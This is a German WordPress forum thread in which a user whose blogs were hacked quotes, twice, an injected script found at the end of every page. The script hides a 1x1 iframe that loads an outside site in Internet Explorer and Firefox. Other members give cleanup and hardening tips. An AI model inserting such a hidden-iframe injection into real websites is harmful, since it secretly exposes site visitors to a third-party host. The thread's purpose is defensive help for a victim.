1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Blogs gehackt - Hoster meldet Ok - was nun??

Dieses Thema im Forum "Allgemeines" wurde erstellt von Diamant, 18. Januar 2012.

Schlagworte:
  1. Diamant

    Diamant Member

    Registriert seit:
    18. Januar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Habe gerade das Forum durchstöbert, da meine Blogs gehackt wurden. Leider habe ich noch keine Lösung gefunden. Ich hoffe hier kann mir jemand weiterhelfen, hab jedoch null Ahnung von solchen Dingen. Hab ein C-Panel Zugang und einen FTP-Zugang, phpmyadmin hab ich auch gefunden, weiß aber nicht was ich da suchen und tun muß.
    Mein Hoster behauptet es ist alles Ok, doch im Quelltext jedes Bloges finde ich am Ende ein Script, welcher im Firefox (ältere Version) und IE nach ca. 8 sec. meinen Blog umleitet. Ich kann mir nicht vorstellen, das ein Hacker jeden Blog einzeln angreift und meine 2 anders gehosteten Seiten dafür verschont. Das Script finde ich leider in keiner index oder php. Tipp vom Hoster, sollte in der index.php oder footer sicher zu finden sein, da ist jedoch gar nichts von diesem teil zu finden. Einen Blog hab ich schon aus versehen lahmgelegt, da ich beim Antivirus Plugin alles was es angab gelöscht habe. Da der aber noch ganz frisch war ist das kein Problem.

    Folgendes finde ich am Ende jedes Quelltextes:

    <script>var url = "http://hotplay24.net";if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){ var f = document.createElement('iframe'); f.setAttribute("width", "1"); f.setAttribute("height", "1"); f.setAttribute("src", url); f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;"); document.getElementsByTagName("body")[0].appendChild(f);}</script><script>var url = "http://hotplay24.net";if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){ var f = document.createElement('iframe'); f.setAttribute("width", "1"); f.setAttribute("height", "1"); f.setAttribute("src", url); f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;"); document.getElementsByTagName("body")[0].appendChild(f);}</script>


    Wer kann mir helfen und sagen wo ich noch suchen kann oder was ich tun muß. Ich bin schon echt am verzweifeln. Gibt es evtl. ein Tool, was alles überprüfen und löschen kann?
    Bin in solchen Dingen absoluten Newbie - bitte für Anfänger beschreiben.

    Achja, eine Blogurl ist xxx.frau-schau. de (weiß nicht ob das Script gefährlich ist oder nicht)

    Ich sage schon mal ganz doll Danke im Voraus
    Manja
     
    #1 Diamant, 18. Januar 2012
    Zuletzt bearbeitet: 18. Januar 2012
  2. befla

    befla Gast

    Schau mal auf virus.befla.de. Dort wird dir angezeigt welche Dateien betroffen sind
     
  3. Windgeflüster

    Windgeflüster Well-Known Member

    Registriert seit:
    27. Mai 2006
    Beiträge:
    168
    Zustimmungen:
    0
    @befla
    wo sieht man welche dateien betroffen sind???? hab das sele prob bei meiner tante auf den blog und mir fehlen noch 2 scripts... wenn ich die url dort eingebe sehe ich aber nicht welche datei betroffen ist?
     
  4. alfredinoK

    alfredinoK Well-Known Member

    Registriert seit:
    4. April 2007
    Beiträge:
    47
    Zustimmungen:
    0
    haut mal den quelltext der index und der footer.php hier rein bitte. und schaut mal ob sich nicht in den images eines versteckt was dort nicht hingehört.
     
  5. Diamant

    Diamant Member

    Registriert seit:
    18. Januar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Danke für die Seite. Bei der Überprüfung find ich ja blankes Grauen vor. Hab gestern den Blog, den ich durch mißlungene Löschversuche zerschossen habe einfach auf die neueste Version upgegradet und danach war das komische Script verschwunden. Laut der von dir empfohlenen Seite ist die nun auch clean, doch kann man dem trauen, das es nicht wiederkommt und nicht nur grad vor sich hinschlummert??

    Hier mal die index.php von dem oben genannten Blog, konnt da nichts falsches erkennen, aber ich kenn mich da auch nicht aus.

    <?php
    get_header();

    if (have_posts())
    {
    while (have_posts())
    {
    art_post();
    }
    art_page_navi();
    } else {
    art_not_found_msg();
    }

    get_footer();

    und die footer.php

    <?php
    $content = ob_get_clean();
    echo art_parse_template(art_page_template(), art_page_variables(array('content'=> $content)));
    ?>
    <div id="wp-footer">
    <?php wp_footer(); ?>
    <!-- <?php printf(__('%d queries. %s seconds.', THEME_NS), get_num_queries(), timer_stop(0, 3)); ?> -->
    </div>
    </body>
    </html>


    Danke Dir
     
  6. alfredinoK

    alfredinoK Well-Known Member

    Registriert seit:
    4. April 2007
    Beiträge:
    47
    Zustimmungen:
    0
    ... ich kann dir nur raten die wp-login.php zu schützen. die waren nicht auf deinem server, was ja auch dein provider sagt, die waren schlicht und einfach in deinem blog (dashboard) selber und haben da was gemacht.

    bei mir war es damals ein codeschnipsel, der auf ein image (png) ging und so wiederrum das script erzeugt wurde. ich habe diesen codeschnipsel entfernt (weiß leider nicht mehr in welcher datei das war) und das eingeschmuggelte image entfernt. seit dem läuft alles stabil.
     
  7. Diamant

    Diamant Member

    Registriert seit:
    18. Januar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Wie schütz ich das am besten?? Nur neues Passwort vergeben oder gibt es noch anderes?
    Image auf dem Blog zum nachschauen, oder wo?? Auf dem einen Blog war nämlich noch nix drauf ausser Impressum und so.
     
  8. alfredinoK

    alfredinoK Well-Known Member

    Registriert seit:
    4. April 2007
    Beiträge:
    47
    Zustimmungen:
    0
    da gibts einiges wie man das schützen kann, sowas aber bitte selber nachlesen - findest du sicher leicht.

    auf deinem server, da wo dein wp liegt findest du einen image-ordner. da dann nach überflüssigen bildern suchen, die, die nicht zum blog gehören. ist schwierig dir das so zu erklären.
     
  9. Diamant

    Diamant Member

    Registriert seit:
    18. Januar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Ok, danke Dir. Den Image-Ordner hab ich schon gefunden - werd mal alles durchstöbern.
    Dann mach ich mich mal schlau, wie ich den Login schützen kann - hoffe ich versteh es.
     
  10. Domino5702

    Domino5702 Well-Known Member

    Registriert seit:
    30. April 2009
    Beiträge:
    2.634
    Zustimmungen:
    0
    Wie kommst Du denn da drauf? Das ist die Art von gefährlichem Halbwissen, die niemandem was nützt.

    Es gibt in der Tat einen gewissen Anteil von Hackerangriffen, die von einem Account aus andere Accounts auf dem selben Server zum Ziel haben. Der Hoster - falls er gut genug ist, das überhaupt festzustellen - sagt davon natürlich erst einmal gar nichts, denn er müsste ja dann eingestehen, dass er in der Pflicht ist.

    Ein Absichern des Admin-Bereichs macht durchaus Sinn, wie das geht, findet man hier oder auch hier.

    Werr ein wenig Englisch kann, dme sei auch dieser ausgezeichnete Artikel empfohlen, der auch seither nichts an Aktualität eingebüsst hat. (hier insbesondere den Abschnitt über "script injections" beachten)

    Recht wenig bekannt ist, dass eines der am meisten genützten FTP-Clients dazu beiträgt, dass die FTP-Zugangsdaten ziemlich einfach auszuspähen sind: FileZilla speichert Passwörter unverschlüsselt. Daher ist es unbedingt ratsam, (a) FTP Zugangsdaten nicht im Client zu speichern, (b) persönliche Daten am Ende jeder Session zu löschen (unter Bearbeiten). So bequem der Server Manager ist, für mich ist er eine Lücke - mein kleines Notizheft, was ich neben dem Rechner liegen habe, kann kein Programm auslesen, mein FileZilla-Client ist trotz guter Absicherung meiner Umgebung, für mich nicht sicher genug.

    Wer sich die Mühe gemacht hat, das obige Skript mal anzuschauen, fragt sich sicher, was denn daran so gefährlich sein soll.
    Code:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    Gefährlich ist die Tatsache, dass das Skript überhaupt da ist. Er hat auch nur die Aufgabe, Sicherheitslücken auszuspähen. Sitzt der Code unentdeckt in der Datei, kann ein anderes Späherprogramm dies feststellen, und wirkliche Schadcodes haben ein "Zuhause" gefunden. Daher müssen nach einem solchen Befall wirklich alle Schadcodes entfernt werden. Ich empfehle meinen Kunden zudem, für einen kurzen Zeitraum alle Dateirechte von befallenen Dateien auf CHMOD 444 zu setzen - nach meinen bisherigen Erfahrungen (über 2 Jahre mit dieser Methode) hat das nie zu Fehlfunktionen in WordPress geführt. Und eine Site, bei der die anzugreifenden Dateien nicht beschreibbar sind, wird für Angreifer uninteressant.

    Ach ja, und falls es jemandem nicht klar sein sollte: selbstverständlich sind alle Passwörter zu ändern, nach einem Befall: auch FTP und Hoster-Zugänge. Und ich richte niemals einen Blog ein, bei dem der Admin "admin" heisst, und wo das Tabellenpräfix "wp_" lautet. :) Und falls mal ein Kunde da meckert, wird er schlicht daran erinnert, dass es in seinem Geldbeutel Weh tut, und meinen Geldbautel anwachsen lässt, wenn er auf solch einfache Mittel verzichten will. Hat bisher immer funktioniert. ;)

    Ich hoffe, ich konnte etwas Licht ins Dunkle bringen - im Übrigen, nichts von dem, was ich jetzt geschrieben habe, steht zum ersten Mal in diesem Forum. Die SuFu ist Dein Freund - wenn der erste Schreck verflogen ist. ;)
     
  11. Diamant

    Diamant Member

    Registriert seit:
    18. Januar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    @Domino - danke auch Dir für Deine Tipps und Antwort.
    Habe das Forum heute Nachmittag ausführlich durchstöbert und einige interessante Infos zum Thema Sicherheit gefunden. Allerdings sind einige Sachen erst einmal "Böhmische Dörfer" für mich, aber Stück für Stück wird es.

    Ja, der erste Schreck ist verflogen - PW sind geändert, auch die vom FTP - admin hatte ich mich zum Glück nie genannt und in allen Blogs einen anderen Usernamen genutzt. Das mit dem wp als Tabellenpräfix versteh ich nur nicht, wo schaut man das nach??
     
  12. Diamant

    Diamant Member

    Registriert seit:
    18. Januar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Kann man diesen Test nur 1x durchführen? habe die Blogs nicht alle da vorher getestet und alle die ich heute teste sind nun sauber. Hatten vorher aber auch diesen Code drin. frau-schau.de und reiseland-norwegen.info werden jedoch immer noch als not up to date und infiziert angezeigt, obwohl ich die upgedatet habe und den Code raus habe.
     
  13. Domino5702

    Domino5702 Well-Known Member

    Registriert seit:
    30. April 2009
    Beiträge:
    2.634
    Zustimmungen:
    0
    Das ist eine der Angaben, die man in die wp-config.php schreibt beim Aufsetzen des Blogs. Dies nachträglich zu ändern ist allerdings eher eine umständliche Geschichte - und ich habe leider auch kein aktuelles Tut, wovon ich Dir den Link hier reinstellen könnte. Sorry. :(
     
  14. Diamant

    Diamant Member

    Registriert seit:
    18. Januar 2012
    Beiträge:
    8
    Zustimmungen:
    0
    Kein Problem, danke Dir. beim nächsten Blog werd ich mal drauf achten, man lernt eben immer dazu. Hab es auch gefunden gehabt und natürlich steht alles auf wp.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden